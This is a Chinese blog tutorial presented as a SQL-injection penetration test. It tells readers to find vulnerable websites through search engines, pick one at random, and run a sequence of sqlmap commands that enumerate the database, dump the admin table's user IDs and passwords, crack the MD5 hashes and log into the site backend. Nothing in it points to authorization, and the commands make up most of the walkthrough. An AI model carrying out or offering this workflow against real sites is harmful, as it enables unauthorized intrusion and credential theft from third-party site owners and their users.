渗透测试实战_sql注入
BitTigerio 2018-02-18
首先我们在搜索引擎上寻找可以注入的网站。这里额外插一句,搜索引擎也是有特定的语法哦~
随便找个网站
下面我们要用sqlmap进行爆破啦,眼睛睁大~
对于sqlmap的安装,直接在python2.7的环境下执行 pip install sqlmap
此时sqlmap已经安装完毕,可以输入sqlmap确认一下,出现下图说明安装成功了
下面我们输入sqlmap.py -u "url" --current-db 获取待注入网站的数据库
输入sqlmap.py -u "url" --current-user 获取当前用户
输入 sqlmap.py -u "url" -D databasename --tables 获取当前数据库所有的表
输入sqlmap.py -u "url" -D databasename -Tadmin --columns 获取admin表的所有字段
输入sqlmap.py -u "url" -D databasename -T admin -C "id,userid,password" --dump
获取所有字段内容(脱库)
此时我们发现这里的密码是md5加密的,我们可以用去执行解密
现在我们已经破解了用户名和密码,可以登录网站后台了
相关推荐
ALiDan 0喜欢 / 0评论 2020-07-27
qshpeng 0喜欢 / 0评论 2020-07-26
世樹 0喜欢 / 0评论 2020-07-17
chenjiazhu 0喜欢 / 0评论 2020-07-08
一对儿程序猿 0喜欢 / 0评论 2020-07-04
明月清风精进不止 0喜欢 / 0评论 2020-06-13
godfather 0喜欢 / 0评论 2020-06-13
ItBJLan 0喜欢 / 0评论 2020-06-11
tanrong 0喜欢 / 0评论 2020-06-11
ALiDan 0喜欢 / 0评论 2020-06-11
码墨 0喜欢 / 0评论 2020-06-09
世樹 0喜欢 / 0评论 2020-06-05
lt云飞扬gt 0喜欢 / 0评论 2020-06-03
godfather 0喜欢 / 0评论 2020-06-03
qshpeng 0喜欢 / 0评论 2020-05-11
明月清风精进不止 0喜欢 / 0评论 2020-05-07
gwn00 0喜欢 / 0评论 2020-05-07
sixyearsorless 0喜欢 / 0评论 2020-05-07
一对儿程序猿 0喜欢 / 0评论 2020-05-06
liuyang000 0喜欢 / 0评论 2020-04-20
一对儿程序猿 0喜欢 / 0评论 2020-04-20
ItBJLan 0喜欢 / 0评论 2020-04-19
sunlizhen 0喜欢 / 0评论 2020-04-10
bluetears 0喜欢 / 0评论 2020-04-09
liuyang000 0喜欢 / 0评论 2020-04-07
dayi 0喜欢 / 0评论 2020-03-28
wkwanglei 0喜欢 / 0评论 2020-03-27
qshpeng 0喜欢 / 0评论 2020-03-26
lightlanguage 0喜欢 / 0评论 2020-03-24
sswqycbailong 0喜欢 / 0评论 2020-03-07
明月清风精进不止 0喜欢 / 0评论 2020-03-06
qshpeng 0喜欢 / 0评论 2020-03-06
lt云飞扬gt 0喜欢 / 0评论 2020-03-04
liuyang000 0喜欢 / 0评论 2020-03-03
xuanlvhaoshao 0喜欢 / 0评论 2020-03-01
gwn00 0喜欢 / 0评论 2020-03-01
xuanlvhaoshao 0喜欢 / 0评论 2020-02-21
seteor 0喜欢 / 0评论 2020-02-20
snowguy 0喜欢 / 0评论 2020-02-18
明月清风精进不止 0喜欢 / 0评论 2020-02-17
ALiDan 0喜欢 / 0评论 2020-02-16
gwn00 0喜欢 / 0评论 2020-02-16
tanrong 0喜欢 / 0评论 2020-02-15
bluet00 0喜欢 / 0评论 2020-02-14
gwn00 0喜欢 / 0评论 2020-02-14
gwn00 0喜欢 / 0评论 2020-02-01